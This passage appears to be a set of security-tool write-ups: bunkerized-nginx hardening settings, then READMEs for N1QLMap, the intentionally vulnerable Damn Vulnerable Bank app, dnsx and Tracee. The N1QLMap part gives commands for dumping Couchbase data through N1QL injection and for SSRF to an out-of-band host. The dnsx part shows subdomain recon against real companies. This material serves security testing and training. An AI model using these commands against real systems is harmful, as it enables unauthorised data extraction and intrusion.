Values : <any valid path inside the container>
Default value :
Context : global
Full path of the key file to use when USE_CUSTOM_HTTPS is set to yes.


Self-signed certificate

GENERATE_SELF_SIGNED_SSL
Values : yes | no
Default value : no
Context : global
If set to yes, HTTPS will be enabled with a container generated self-signed certificate.

SELF_SIGNED_SSL_EXPIRY
Values : integer
Default value : 365 (1 year)
Context : global
Needs GENERATE_SELF_SIGNED_SSL to work. Sets the expiry date for the self generated certificate.

SELF_SIGNED_SSL_COUNTRY
Values : text
Default value : Switzerland
Context : global
Needs GENERATE_SELF_SIGNED_SSL to work. Sets the country for the self generated certificate.

SELF_SIGNED_SSL_STATE
Values : text
Default value : Switzerland
Context : global
Needs GENERATE_SELF_SIGNED_SSL to work. Sets the state for the self generated certificate.

SELF_SIGNED_SSL_CITY
Values : text
Default value : Bern
Context : global
Needs GENERATE_SELF_SIGNED_SSL to work. Sets the city for the self generated certificate.

SELF_SIGNED_SSL_ORG
Values : text
Default value : AcmeInc
Context : global
Needs GENERATE_SELF_SIGNED_SSL to work. Sets the organisation name for the self generated certificate.

SELF_SIGNED_SSL_OU
Values : text
Default value : IT
Context : global
Needs GENERATE_SELF_SIGNED_SSL to work. Sets the organisational unit for the self generated certificate.

SELF_SIGNED_SSL_CN
Values : text
Default value : bunkerity-nginx
Context : global
Needs GENERATE_SELF_SIGNED_SSL to work. Sets the CN server name for the self generated certificate.


Misc

HTTP2
Values : yes | no
Default value : yes
Context : global, multisite
If set to yes, nginx will use the HTTP/2 protocol when HTTPS is enabled.

HTTPS_PROTOCOLS
Values : TLSv1.2 | TLSv1.3 | TLSv1.2 TLSv1.3
Default value : TLSv1.2 TLSv1.3
Context : global, multisite
The supported versions of TLS. We recommend the default value TLSv1.2 TLSv1.3 for compatibility reasons.


ModSecurity

USE_MODSECURITY
Values : yes | no
Default value : yes
Context : global, multisite
If set to yes, the ModSecurity WAF will be enabled.
You can include custom rules by adding .conf files into the /modsec-confs/ directory inside the container (e.g. through a volume).

USE_MODSECURITY_CRS
Values : yes | no
Default value : yes
Context : global, multisite
If set to yes, the OWASP ModSecurity Core Rule Set will be used. It provides generic rules to detect common web attacks.
You can customize the CRS (e.g. add WordPress exclusions) by adding custom .conf files into the /modsec-crs-confs/ directory inside the container (e.g. through a volume). Files inside this directory are included before the CRS rules. If you need to tweak rules (e.g. SecRuleUpdateTargetById), put .conf files inside /modsec-confs/, which is included after the CRS rules.


Security headers

X_FRAME_OPTIONS
Values : DENY | SAMEORIGIN | ALLOW-FROM https://www.website.net | ALLOWALL
Default value : DENY
Context : global, multisite
Policy to be used when the site is displayed through iframe. Can be used to mitigate clickjacking attacks. More info here.

X_XSS_PROTECTION
Values : 0 | 1 | 1; mode=block
Default value : 1; mode=block
Context : global, multisite
Policy to be used when XSS is detected by the browser. Only works with Internet Explorer.
More info here.

X_CONTENT_TYPE_OPTIONS
Values : nosniff
Default value : nosniff
Context : global, multisite
Tells the browser to be strict about MIME type.
More info here.

REFERRER_POLICY
Values : no-referrer | no-referrer-when-downgrade | origin | origin-when-cross-origin | same-origin | strict-origin | strict-origin-when-cross-origin | unsafe-url
Default value : no-referrer
Context : global, multisite
Policy to be used for the Referer header.
More info here.

FEATURE_POLICY
Values : <directive> <allow list>
Default value : accelerometer 'none'; ambient-light-sensor 'none'; autoplay 'none'; camera 'none'; display-capture 'none'; document-domain 'none'; encrypted-media 'none'; fullscreen 'none'; geolocation 'none'; gyroscope 'none'; magnetometer 'none'; microphone 'none'; midi 'none'; payment 'none'; picture-in-picture 'none'; speaker 'none'; sync-xhr 'none'; usb 'none'; vibrate 'none'; vr 'none'
Context : global, multisite
Tells the browser which features can be used on the website.
More info here.

PERMISSIONS_POLICY
Values : feature=(allow list)
Default value : accelerometer=(), ambient-light-sensor=(), autoplay=(), camera=(), display-capture=(), document-domain=(), encrypted-media=(), fullscreen=(), geolocation=(), gyroscope=(), magnetometer=(), microphone=(), midi=(), payment=(), picture-in-picture=(), speaker=(), sync-xhr=(), usb=(), vibrate=(), vr=()
Context : global, multisite
Tells the browser which features can be used on the website.
More info here.

COOKIE_FLAGS
Values : * HttpOnly | MyCookie secure SameSite=Lax | ...
Default value : * HttpOnly SameSite=Lax
Context : global, multisite
Adds some security to the cookies set by the server.
Accepted value can be found here.

COOKIE_AUTO_SECURE_FLAG
Values : yes | no
Default value : yes
Context : global, multisite
When set to yes, the secure flag will be automatically added to cookies when using HTTPS.

STRICT_TRANSPORT_POLICY
Values : max-age=expireTime [; includeSubDomains] [; preload]
Default value : max-age=31536000
Context : global, multisite
Tells the browser to use exclusively HTTPS instead of HTTP when communicating with the server.
More info here.

CONTENT_SECURITY_POLICY
Values : <directive 1>; <directive 2>; ...
Default value : default-src 'self'; frame-ancestors 'self'; form-action 'self'; block-all-mixed-content; sandbox allow-forms allow-same-origin allow-scripts; reflected-xss block; base-uri 'self'; referrer no-referrer
Context : global, multisite
Policy to be used when loading resources (scripts, forms, frames, ...).
More info here.


Blocking

Antibot

USE_ANTIBOT
Values : no | cookie | javascript | captcha | recaptcha
Default value : no
Context : global, multisite
If set to any allowed value other than no, users must complete a "challenge" before accessing the pages on your website :

  • cookie : asks the user to set a cookie
  • javascript : users must execute JavaScript code
  • captcha : a text captcha must be solved by the user
  • recaptcha : use the Google reCAPTCHA v3 score to allow/deny users

ANTIBOT_URI
Values : <any valid uri>
Default value : /challenge
Context : global, multisite
A valid and unused URI to redirect users to when USE_ANTIBOT is used. Be sure that it doesn't exist on your website.

ANTIBOT_SESSION_SECRET
Values : random | <32 chars of your choice>
Default value : random
Context : global, multisite
A secret used to generate sessions when USE_ANTIBOT is set. Using the special random value will generate a random one. Be sure to use the same value when you are in a multi-server environment (so sessions are valid in all the servers).

ANTIBOT_RECAPTCHA_SCORE
Values : <0.0 to 1.0>
Default value : 0.7
Context : global, multisite
The minimum score required when USE_ANTIBOT is set to recaptcha.

ANTIBOT_RECAPTCHA_SITEKEY
Values : <public key given by Google>
Default value :
Context : global
The sitekey given by Google when USE_ANTIBOT is set to recaptcha.

ANTIBOT_RECAPTCHA_SECRET
Values : <private key given by Google>
Default value :
Context : global
The secret given by Google when USE_ANTIBOT is set to recaptcha.


External blacklists

BLOCK_USER_AGENT
Values : yes | no
Default value : yes
Context : global, multisite
If set to yes, blocks clients with a "bad" user agent.
Blacklist can be found here.

BLOCK_TOR_EXIT_NODE
Values : yes | no
Default value : yes
Context : global, multisite
If set to yes, known TOR exit nodes will be blocked.
Blacklist can be found here.

BLOCK_PROXIES
Values : yes | no
Default value : yes
Context : global, multisite
If set to yes, known proxies will be blocked.
Blacklist can be found here.

BLOCK_ABUSERS
Values : yes | no
Default value : yes
Context : global, multisite
If set to yes, known abusers will be blocked.
Blacklist can be found here.


DNSBL

USE_DNSBL
Values : yes | no
Default value : yes
Context : global, multisite
If set to yes, DNSBL checks will be performed to the servers specified in the DNSBL_LIST environment variable.

DNSBL_LIST
Values : <list of DNS zones separated with spaces>
Default value : bl.blocklist.de problems.dnsbl.sorbs.net sbl.spamhaus.org xbl.spamhaus.org
Context : global
The list of DNSBL zones to query when USE_DNSBL is set to yes.


CrowdSec

USE_CROWDSEC
Values : yes | no
Default value : no
Context : global, multisite
If set to yes, CrowdSec will be enabled with the nginx collection. API pulls will be done automatically.


Custom whitelisting

USE_WHITELIST_IP
Values : yes | no
Default value : yes
Context : global, multisite
If set to yes, lets you define custom IP addresses to be whitelisted through the WHITELIST_IP_LIST environment variable.

WHITELIST_IP_LIST
Values : <list of IP addresses separated with spaces>
Default value : 23.21.227.69 40.88.21.235 50.16.241.113 50.16.241.114 50.16.241.117 50.16.247.234 52.204.97.54 52.5.190.19 54.197.234.188 54.208.100.253 54.208.102.37 107.21.1.8
Context : global
The list of IP addresses to whitelist when USE_WHITELIST_IP is set to yes. The default list contains IP addresses of the DuckDuckGo crawler.

USE_WHITELIST_REVERSE
Values : yes | no
Default value : yes
Context : global, multisite
If set to yes, lets you define custom reverse DNS suffixes to be whitelisted through the WHITELIST_REVERSE_LIST environment variable.

WHITELIST_REVERSE_LIST
Values : <list of reverse DNS suffixes separated with spaces>
Default value : .googlebot.com .google.com .search.msn.com .crawl.yahoot.net .crawl.baidu.jp .crawl.baidu.com .yandex.com .yandex.ru .yandex.net
Context : global
The list of reverse DNS suffixes to whitelist when USE_WHITELIST_REVERSE is set to yes. The default list contains suffixes of major search engines.


Custom blacklisting

USE_BLACKLIST_IP
Values : yes | no
Default value : yes
Context : global, multisite
If set to yes, lets you define custom IP addresses to be blacklisted through the BLACKLIST_IP_LIST environment variable.

BLACKLIST_IP_LIST
Values : <list of IP addresses separated with spaces>
Default value :
Context : global
The list of IP addresses to blacklist when USE_BLACKLIST_IP is set to yes.

USE_BLACKLIST_REVERSE
Values : yes | no
Default value : yes
Context : global, multisite
If set to yes, lets you define custom reverse DNS suffixes to be blacklisted through the BLACKLIST_REVERSE_LIST environment variable.

BLACKLIST_REVERSE_LIST
Values : <list of reverse DNS suffixes separated with spaces>
Default value : .shodan.io
Context : global
The list of reverse DNS suffixes to blacklist when USE_BLACKLIST_REVERSE is set to yes.


Requests limiting

USE_LIMIT_REQ
Values : yes | no
Default value : yes
Context : global, multisite
If set to yes, the number of HTTP requests made by a user will be limited during a period of time.
More info on rate limiting here.

LIMIT_REQ_RATE
Values : Xr/s | Xr/m
Default value : 20r/s
Context : global, multisite
The rate limit to apply when USE_LIMIT_REQ is set to yes. The default is 20 requests per second.

LIMIT_REQ_BURST
Values : <any valid integer>
Default value : 40
Context : global, multisite
The number of requests to queue before rejecting further requests.

LIMIT_REQ_CACHE
Values : Xm | Xk
Default value : 10m
Context : global
The size of the cache to store information about request limiting.


Countries

BLACKLIST_COUNTRY
Values : <country code 1> <country code 2> ...
Default value :
Context : global, multisite
Block some countries from accessing your website. Use two-letter country codes separated with spaces.

WHITELIST_COUNTRY
Values : <country code 1> <country code 2> ...
Default value :
Context : global, multisite
Only allow specific countries to access your website. Use two-letter country codes separated with spaces.


PHP

REMOTE_PHP
Values : <any valid IP/hostname>
Default value :
Context : global, multisite
Set the IP address/hostname of a remote PHP-FPM instance that will execute the .php files. See USE_PHP if you want to run a PHP-FPM instance in the same container as bunkerized-nginx.

REMOTE_PHP_PATH
Values : <any valid absolute path>
Default value : /app
Context : global, multisite
The path where the PHP files are located inside the server specified in REMOTE_PHP.


Fail2ban

USE_FAIL2BAN
Values : yes | no
Default value : yes
Context : global, multisite
If set to yes, fail2ban will be used to block users generating too many "strange" HTTP codes in a period of time.
Instead of using iptables, which is not possible inside a container, fail2ban dynamically updates nginx to ban/unban IP addresses.
If a number (FAIL2BAN_MAXRETRY) of "strange" HTTP codes (FAIL2BAN_STATUS_CODES) is found within a time interval (FAIL2BAN_FINDTIME), the originating IP address will be banned for a specific period of time (FAIL2BAN_BANTIME).

FAIL2BAN_STATUS_CODES
Values : <HTTP status codes separated with | char>
Default value : 400|401|403|404|405|444
Context : global
List of "strange" error codes that fail2ban will search for.

FAIL2BAN_BANTIME
Values :
Default value : 3600
Context : global
The duration, in seconds, of a ban.

FAIL2BAN_FINDTIME
Values :
Default value : 60
Context : global
The time interval, in seconds, to search for "strange" HTTP status codes.

FAIL2BAN_MAXRETRY
Values : <any positive integer>
Default value : 15
Context : global
The number of "strange" HTTP status codes to find between the time interval.


ClamAV

USE_CLAMAV_UPLOAD
Values : yes | no
Default value : yes
Context : global, multisite
If set to yes, ClamAV will scan every file upload and block the upload if a malicious file is detected.

USE_CLAMAV_SCAN
Values : yes | no
Default value : yes
Context : global
If set to yes, ClamAV will scan all the files inside the container every day.

CLAMAV_SCAN_REMOVE
Values : yes | no
Default value : yes
Context : global
If set to yes, ClamAV will automatically remove the detected files.


Misc

ADDITIONAL_MODULES
Values : <list of packages separated with space>
Default value :
Context : global
You can specify additional modules to install. All Alpine packages are valid.

LOGROTATE_MINSIZE
Values : x | xk | xM | xG
Default value : 10M
Context : global
The minimum size of a log file before being rotated (no letter = bytes, k = kilobytes, M = megabytes, G = gigabytes).

LOGROTATE_MAXAGE
Values : <any integer>
Default value : 7
Context : global
The number of days before rotated files are deleted.


Include custom configurations

Custom configuration files (ending with the .conf suffix) can be added in dedicated directories inside the container :

  • /http-confs : http context
  • /server-confs : server context

You just need to use a volume like this :

docker run ... -v /path/to/http/confs:/http-confs:ro ... -v /path/to/server/confs:/server-confs:ro ... bunkerity/bunkerized-nginx

When MULTISITE is set to yes, .conf files inside the /server-confs directory are loaded by all the server blocks. You can also set a custom configuration for a specific server block by adding files in a subdirectory named after the host defined in the SERVER_NAME environment variable. Here is an example :

docker run ... -v /path/to/server/confs:/server-confs:ro ... -e MULTISITE=yes -e "SERVER_NAME=app1.domain.com app2.domain.com" ... bunkerity/bunkerized-nginx

The /path/to/server/confs directory should have a structure like this :

/path/to/server/confs
├── app1.domain.com
│   ├── custom.conf
│   └── ...
└── app2.domain.com
    ├── custom.conf
    └── ...

Cache data

You can store cached data (blacklists, geoip DB, ...) to avoid downloading them again after a container deletion by mounting a volume on the /cache directory :

docker run ... -v /path/to/cache:/cache ... bunkerity/bunkerized-nginx


N1QLMap - The Tool Exfiltrates Data From Couchbase Database By Exploiting N1QL Injection Vulnerabilities



N1QLMap is an N1QL exploitation tool. It currently works with the Couchbase database. The tool supports data extraction and performing SSRF attacks via CURL. More information can be found here: https://labs.f-secure.com/blog/n1ql-injection-kind-of-sql-injection-in-a-nosql-database.


Usage

Help
usage: n1qlMap.py [-h] [-r REQUEST] [-k KEYWORD] [--proxy PROXY] [--validatecerts] [-v]
(-d | -ks DATASTORE_URL | -e KEYSPACE_ID | -q QUERY | -c [ENDPOINT [OPTIONS ...]])
host

positional arguments:
host Host used to send an HTTP request e.g. https://vulndomain.net

optional arguments:
-h, --help show this help message and exit
-r REQUEST, --request REQUEST
Path to an HTTP request
-k KEYWORD, --keyword KEYWORD
Keyword that exists in HTTP response when query is successful
--proxy PROXY Proxy server address
--validatecerts Set the flag to enforce certificate validation. Certificates are not validated by default!
-v, --verbose_debug Set the verbosity level to debug
-d, --datastores Lists available datastores
-ks DATASTORE_URL, --keyspaces DATASTORE_URL
Lists available keyspaces for specific datastore URL
-e KEYSPACE_ID, --extract KEYSPACE_ID
Extracts data from a specific keyspace
-q QUERY, --query QUERY
Run arbitrary N1QL query
-c [ENDPOINT [OPTIONS ...]], --curl [ENDPOINT [OPTIONS ...]]
Runs CURL N1QL function inside the query, can be used to SSRF

Usage
  1. Put an HTTP request into the request.txt file. Mark the injection point using *i*. See the example_request_1.txt file for a reference.
  2. Use one of the following commands.

Extracts datastores:

$ ./n1qlMap.py http://localhost:3000 --request example_request_1.txt --keyword beer-sample --datastores

Extracts keyspaces from the specific datastore ID:

$ ./n1qlMap.py http://localhost:3000 --request example_request_1.txt --keyword beer-sample --keyspaces "http://127.0.0.1:8091"

Extracts all documents from the given keyspace:

$ ./n1qlMap.py http://localhost:3000 --request example_request_1.txt --keyword beer-sample --extract travel-sample

Run arbitrary query:

$ ./n1qlMap.py http://localhost:3000 --request example_request_1.txt --keyword beer-sample --query 'SELECT * FROM `travel-sample` AS T ORDER by META(T).id LIMIT 1'

Perform CURL request / SSRF:

$ ./n1qlMap.py http://localhost:3000 --request example_request_1.txt --keyword beer-sample --curl *************j3mrt7xy3pre.burpcollaborator.net "{'request':'POST','data':'data','header':['User-Agent: Agent Smith']}"

Demo

To play with the vulnerability you can spin up Docker machines with Couchbase and a NodeJS web application. If you have already met the Requirements, just run:

cd n1ql-demo
./quick_setup.sh

Now, you can run the commands described in the Usage section against the Dockerised web application.


Requirements

The N1QLMap.py script doesn't have any specific requirements apart from Python 3.

The following requirements are only for the demo provided in the n1ql-demo directory.

  • Docker
  • Docker Compose

To install Docker and Docker Compose on Kali:

# Docker Installation
curl -fsSL https://download.docker.com/linux/debian/gpg | apt-key add -
echo 'deb [arch=amd64] https://download.docker.com/linux/debian buster stable' > /etc/apt/sources.list.d/docker.list
apt-get update

apt-get remove docker docker-engine docker.io
apt-get install docker-ce

# Start Docker Service
systemctl start docker

# Docker Compose Installation
sudo curl -L "https://github.com/docker/compose/releases/download/1.24.1/docker-compose-$(uname -s)-$(uname -m)" -o /usr/local/bin/docker-compose
sudo chmod +x /usr/local/bin/docker-compose

Let's test Docker:

docker run hello-world


Damn-Vulnerable-Bank - Vulnerable Banking Application For Android



The Damn Vulnerable Bank Android application aims to provide an interface for everyone to get a detailed understanding of the internals and security aspects of an Android application.



How to Use Application
  • Clone the repository and run the backend server as per the instructions in the link.
  • We have released the APK, so after downloading it, install it via adb or manually.
  • After installation, open the app and add the backend IP on the home screen.
  • Test the running status by pressing health check.
  • Now create an account via the signup option and then log in with your credentials.
  • Now you can see the dashboard and perform banking operations.
  • Log in as admin to approve beneficiaries.
  • The database is pre-populated with a few users for quick exploration.
Username   Password    Account Number   Beneficiaries            Admin privileges
user1      password1   111111           222222, 333333, 444444   No
user2      password2   222222           None                     No
user3      password3   333333           None                     No
user4      password4   444444           None                     No
admin      admin       999999           None                     Yes

Features
  • Sign up
  • Login
  • My profile interface
  • Change password
  • Settings interface to update backend URL
  • Add fingerprint check before transferring/viewing funds
  • Add pin check before transferring/viewing funds
  • View balance
  • Transfer money
    • Via manual entry
    • Via QR scan
  • Add beneficiary
  • Delete beneficiary
  • View beneficiary
  • View transactions history
  • Download transactions history

Building the Apk with Obfuscation
  • Go to Build options and select Generate Signed Bundle/APK
  • Then select APK as the option and click next
  • Now we need a keystore to sign the APK
  • Create a new keystore and remember its password
  • After creating it, select that keystore and enter the password
  • Now select the Release build variant and signature version V2
  • Now we can build the APK successfully

List of vulnerabilities in the application

To keep things crisp and interesting, we have hidden this section. Do not toggle this button if you want a fun and challenging experience. Try to explore the application, find all the possible vulnerabilities, and then cross-check your findings with this list.

Spoiler Alert
  • Root and emulator detection
  • Anti-debugging checks (prevents hooking with frida, jdb, etc)
  • SSL pinning - pin the certificate/public key
  • Obfuscate the entire code
  • Encrypt all requests and responses
  • Hardcoded sensitive information
  • Logcat leakage
  • Insecure storage (saved credit card numbers maybe)
  • Exported activities
  • JWT token
  • Webview integration
  • Deep links
  • IDOR

Backend to-do
  • Add profile and change-password routes
  • Create different secrets for admin and other users
  • Add dynamic generation of secrets to verify JWT tokens
  • Introduce bug in jwt verification
  • Find a way to store database and mount it while using docker
  • Dockerize environment

Authors

Thanks to these amazing people

Rewanth Cool (REST API) - Github, LinkedIn
Hrushikesh Kakade (Android App) - Github, LinkedIn
Akshansh Jaiswal (Android App) - Github, LinkedIn


DNSx - A Fast And Multi-Purpose DNS Toolkit Allow To Run Multiple DNS Queries Of Your Choice With A List Of User-Supplied Resolvers



dnsx is a fast and multi-purpose DNS toolkit that allows you to run multiple probers using the retryabledns library, performing multiple DNS queries of your choice with a list of user-supplied resolvers.

dnsx is the successor of dnsprobe; it includes new features and multiple bug fixes, and is tailored for a better user experience. A few notable flags are resp and resp-only, which let you control and print exactly the information you are looking for.

We also ported the DNS wildcard filtering feature from shuffledns to dnsx as standalone support.


Features
 
  • Simple and Handy utility to query DNS records.
  • Supports A, AAAA, CNAME, PTR, NS, MX, TXT, SOA
  • Handles wildcard subdomains in an automated way.
  • Optimized for ease of use.
  • Stdin and stdout support to work with other tools.

Usage
dnsx -h

This will display help for the tool. Here are all the switches it supports.

Flag        Description                               Example
a           Query A record                            dnsx -a
aaaa        Query AAAA record                         dnsx -aaaa
cname       Query CNAME record                        dnsx -cname
ns          Query NS record                           dnsx -ns
ptr         Query PTR record                          dnsx -ptr
txt         Query TXT record                          dnsx -txt
mx          Query MX record                           dnsx -mx
soa         Query SOA record                          dnsx -soa
raw         Operates like dig                         dnsx -raw
l           File input list of subdomains/hosts       dnsx -l list.txt
json        JSON output                               dnsx -json
r           File or comma separated resolvers         dnsx -r 1.1.1.1
rl          Limit of DNS requests/second              dnsx -rl 100
resp        Display response data                     dnsx -cname -resp
resp-only   Display only response data                dnsx -cname -resp-only
retry       Number of DNS retries                     dnsx -retry 1
silent      Show only results in the output           dnsx -silent
o           File to write output to (optional)        dnsx -o output.txt
t           Concurrent threads to make                dnsx -t 250
verbose     Verbose output                            dnsx -verbose
version     Show version of dnsx                      dnsx -version
wd          Wildcard domain name for filtering        dnsx -wd example.com
wt          Wildcard filter threshold                 dnsx -wt 5

Installation Instructions

From Binary

The installation is easy. You can download the pre-built binaries for your platform from the Releases page. Extract them using tar, move the binary to your $PATH and you're ready to go.

Download latest binary from https://github.com/projectdiscovery/dnsx/releases

▶ tar -xvf dnsx-linux-amd64.tar
▶ mv dnsx-linux-amd64 /usr/local/bin/dnsx
▶ dnsx -h

From Source

dnsx requires go1.14+ to install successfully. Run the following command to get the repo -

▶ GO111MODULE=on go get -u -v github.com/projectdiscovery/dnsx/cmd/dnsx

From Github
▶ git clone https://github.com/projectdiscovery/dnsx.git; cd dnsx/cmd/dnsx; go build; mv dnsx /usr/local/bin/; dnsx -version

Running dnsx

dnsx can be used to filter dead records from the list of passive subdomains obtained from various sources, for example:-

subfinder -silent -d hackerone.com | dnsx

_ __ __
__| | _ __ ___ \ \/ /
/ _' || '_ \ / __| \ /
| (_| || | | |\__ \ / \
\__,_||_| |_||___//_/\_\ v1.0

projectdiscovery.io

[WRN] Use with caution. You are responsible for your actions
[WRN] Developers assume no liability and are not responsible for any misuse or damage.

a.ns.hackerone.com
www.hackerone.com
api.hackerone.com
docs.hackerone.com
mta-sts.managed.hackerone.com
mta-sts.hackerone.com
resources.hackerone.com
b.ns.hackerone.com
mta-sts.forwarding.hackerone.com
events.hackerone.com
support.hackerone.com

dnsx can be used to extract A records for the given list of subdomains, for example:-

▶ subfinder -silent -d hackerone.com | dnsx -silent -a -resp

a.ns.hackerone.com [162.159.0.31]
b.ns.hackerone.com [162.159.1.31]
mta-sts.hackerone.com [185.199.108.153]
events.hackerone.com [208.100.11.134]
mta-sts.managed.hackerone.com [185.199.108.153]
resources.hackerone.com [52.60.160.16]
resources.hackerone.com [52.60.165.183]
www.hackerone.com [104.16.100.52]
support.hackerone.com [104.16.53.111]

dnsx can be used to extract CNAME records for the given list of subdomains, for example:-

▶ subfinder -silent -d hackerone.com | dnsx -silent -cname -resp

support.hackerone.com [hackerone.zendesk.com]
resources.hackerone.com [read.uberflip.com]
mta-sts.hackerone.com [hacker0x01.github.io]
mta-sts.forwarding.hackerone.com [hacker0x01.github.io]
events.hackerone.com [whitelabel.bigmarker.com]

dnsx can be used to extract subdomains from given network range using PTR query, for example:-

mapcidr -cidr 173.0.84.0/24 -silent | dnsx -silent -resp-only -ptr

cors.api.paypal.com
trinityadminauth.paypal.com
cld-edge-origin-api.paypal.com
appmanagement.paypal.com
svcs.paypal.com
trinitypie-serv.paypal.com
ppn.paypal.com
pointofsale-new.paypal.com
pointofsale.paypal.com
slc-a-origin-pointofsale.paypal.com
fpdbs.paypal.com

Wildcard filtering

A special feature of dnsx is its ability to handle multi-level DNS-based wildcards, and to do so with a very small number of DNS requests. Sometimes all the subdomains will resolve, which leads to lots of garbage in the results. The way dnsx handles this is by keeping track of how many subdomains point to an IP; if the count of subdomains increases beyond a small threshold, it will check for a wildcard on all levels of the hosts for that IP iteratively.

dnsx -l airbnb-subs.txt -wd airbnb.com -o output.txt
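
The heuristic is easy to picture outside of Go. Below is a rough Python sketch of the same idea (not dnsx's actual implementation; the helper names and the threshold constant are ours, mirroring the -wt flag): count how many hosts resolve to the same IP and, once a small threshold is crossed, probe a random label at each level of the host to confirm a wildcard.

# Illustrative sketch only -- dnsx itself is written in Go.
import random
import socket
import string
from collections import defaultdict

THRESHOLD = 5  # like -wt: how many hosts on one IP before we get suspicious

def resolve(name):
    try:
        return socket.gethostbyname(name)
    except socket.gaierror:
        return None

def is_wildcard_ip(ip, sample_host, domain):
    # Probe a random, almost certainly unregistered label at every level of
    # the host (a.b.example.com -> b.example.com -> example.com).
    parts = sample_host.split(".")
    levels = [".".join(parts[i:]) for i in range(1, len(parts))]
    for level in (l for l in levels if l.endswith(domain)):
        junk = "".join(random.choices(string.ascii_lowercase, k=12))
        if resolve(f"{junk}.{level}") == ip:
            return True  # a random label resolved: this level is a wildcard
    return False

def filter_wildcards(hosts, domain):
    by_ip = defaultdict(list)
    for host in hosts:
        ip = resolve(host)
        if ip:
            by_ip[ip].append(host)
    kept = []
    for ip, names in by_ip.items():
        if len(names) >= THRESHOLD and is_wildcard_ip(ip, names[0], domain):
            continue  # drop every host hiding behind the wildcard IP
        kept.extend(names)
    return kept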

Notes
  • By default, dnsx checks for the A record.
  • By default, dnsx uses the Google, Cloudflare, and Quad9 resolvers.
  • A domain name input is mandatory for wildcard elimination.
  • DNS record flags cannot be used together with wildcard filtering.

dnsx is made with ❤️ by the projectdiscovery team.

Tracee - Container And System Event Tracing Using eBPF


Tracee is a lightweight and easy to use container and system tracing tool. It allows you to observe system calls and other system events in real-time. A unique feature of Tracee is that it will only trace newly created processes and containers (that were started after Tracee has started), in order to help the user focus on relevant events instead of every single thing that happens on the system (which can be overwhelming). Adding new events to Tracee (especially system calls) is straightforward, and will usually require no more than adding a few lines of code.


Other than tracing, Tracee is also capable of capturing files written to disk or memory ("fileless"), and extracting binaries that are dynamically loaded to an application's memory (e.g. when an application uses a packer). With these features, it is possible to quickly gain insights about the running processes that previously required the use of dynamic analysis tools and special knowledge.

Check out this quick demo of tracee


Getting started

Prerequisites
  • To run, Tracee requires Linux kernel version >= 4.14

Not required if using the Docker image:

  • C standard library (tested with glibc)
  • libelf and zlib libraries
  • clang >= 9

Not required if pre-compiling the eBPF code (see Installation options):

  • clang >= 9
  • Kernel headers available under /usr/src, must be provided by user and match the running kernel version, not needed if building the eBPF program in advance

Quickstart with Docker
docker run --name tracee --rm --privileged --pid=host -v /lib/modules/:/lib/modules/:ro -v /usr/src:/usr/src:ro -v /tmp/tracee:/tmp/tracee aquasec/tracee

Note: You may need to change the volume mounts for the kernel headers based on your setup.

This will run Tracee with no arguments, which defaults to collecting all events from all newly created processes and printing them in a table to standard output.


Setup options

Tracee is made of an executable that drives the eBPF program (tracee), and the eBPF program itself (tracee.bpf.$kernelversion.$traceeversion.o). When the tracee executable is started, it will look for the eBPF program next to the executable, or in /tmp/tracee, or in a directory specified in TRACEE_BPF_FILE environment variable. If the eBPF program is not found, the executable will attempt to build it automatically before it starts (you can control this using the --build-policy flag).
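
For illustration, the lookup order described above can be approximated like this (a Python sketch of the search logic, not tracee's Go code; the helper name is ours):

import os
import sys

def find_bpf_object(filename):
    # Search order described above: next to the executable, then /tmp/tracee,
    # then an explicit TRACEE_BPF_FILE override.
    candidates = [
        os.path.join(os.path.dirname(os.path.abspath(sys.argv[0])), filename),
        os.path.join("/tmp/tracee", filename),
        os.environ.get("TRACEE_BPF_FILE", ""),
    ]
    for path in candidates:
        if path and os.path.isfile(path):
            return path
    return None  # caller falls back to building the eBPF program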

The easiest way to get started is to let the tracee executable build the eBPF program for you automatically. You can obtain the executable in any of the following ways:

  1. Download from the GitHub Releases (tracee.tar.gz).
  2. Use the docker image from Docker Hub: aquasec/tracee (includes all the required dependencies).
  3. Build the executable from source using make build. For that you will need additional development tooling.
  4. Build the executable from source in a Docker container which includes all development tooling, using make build DOCKER=1.

Alternatively, you can pre-compile the eBPF program and provide it to the tracee executable. There are some benefits to this approach: you will not need clang and kernel headers at runtime anymore, and you reduce the risk of invoking an external program at runtime. You can build the eBPF program in the following ways:

  1. make bpf
  2. make bpf DOCKER=1 to build in a Docker container which includes all development tooling.
  3. There is also a handy make all (and the make all DOCKER=1 variant) which builds both the executable and the eBPF program.

Once you have the eBPF program artifact, you can provide it to Tracee in any of the locations mentioned above. In this case, the full Docker image can be replaced by the lighter-weight aquasec/tracee:slim image. This image cannot build the eBPF program on its own, and is meant to be used when you have already compiled the eBPF program beforehand.


Running in container

Tracee uses a filesystem directory, by default /tmp/tracee, to capture runtime artifacts, internal components, and other miscellaneous items. When running in a container, it's useful to mount this directory in, so that the artifacts are accessible after the container exits. For example, you can add this to the docker run command: -v /tmp/tracee:/tmp/tracee.

If running in a container, regardless if it's the full or slim image, it's advisable to reuse the eBPF program across runs by mounting it from the host to the container. This way if the container builds the eBPF program it will be persisted on the host, and if the eBPF program already exists on the host, the container will automatically discover it. If you've already mounted the /tmp/tracee directory from the host, you're good to go, since Tracee by default will use this location for the eBPF program. You can also mount the eBPF program file individually if it's stored elsewhere (e.g in a shared volume), for example: -v /path/to/tracee.bpf.1_2_3.4_5_6.o:/some/path/tracee.bpf.1_2_3.4_5_6.o -e TRACEE_BPF_FILE=/some/path.

When using the --capture exec option, Tracee needs access to the host PID namespace. For Docker, add --pid=host to the run command.

If you are building the eBPF program in a container, you'll need to make the kernel headers available in the container. The quickstart example has wide mounts that work in a variety of cases, for demonstration purposes. If you want, you can narrow those mounts down to a directory that contains the headers on your setup, for example: -v /path/to/headers:/myheaders -e KERN_SRC=/myheaders. As mentioned before, a better practice for production is to pre-compile the eBPF program, in which case the kernel headers are not needed at runtime.


Permissions

If Tracee is not actually tracing, it doesn't need privileges. For example, just building the eBPF program, or listing the available options, can be done with a regular user.
For actually tracing, Tracee needs to run with sufficient capabilities:

  • CAP_SYS_RESOURCE (to manage eBPF maps limits)
  • CAP_BPF+CAP_TRACING which are available on recent kernels (>=5.8), or SYS_ADMIN on older kernels (to load and attach the eBPF programs).

Alternatively, running as root or with the --privileged flag of Docker, is an easy way to start.


Using Tracee

Understanding the output

Here's a sample output of running Tracee with no additional arguments (which defaults to tracing all events):

TIME(s)        UID    COMM             PID     TID     RET             EVENT                ARGS
176751.746515 1000 zsh 14726 14726 0 execve pathname: /usr/bin/ls, argv: [ls]
176751.746772 1000 zsh 14726 14726 0 security_bprm_check pathname: /usr/bin/ls, dev: 8388610, inode: 777
